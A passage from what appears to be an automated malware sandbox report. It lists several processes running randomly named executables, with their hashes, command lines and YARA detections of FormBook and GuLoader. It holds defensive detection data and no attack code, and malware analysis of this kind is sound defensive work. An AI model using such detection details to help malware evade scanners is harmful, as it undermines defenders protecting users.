                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2962810507.0000000002234000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:14
                                          Start time:10:54:38
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\6598NWeXn4d.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:15
                                          Start time:10:54:48
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\Go8zzyHYSzv.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:17
                                          Start time:10:55:00
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\FFwqjpuGr.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:18
                                          Start time:10:55:12
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\XkMQicXLAokJ.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Disassembly

                                          Reset < >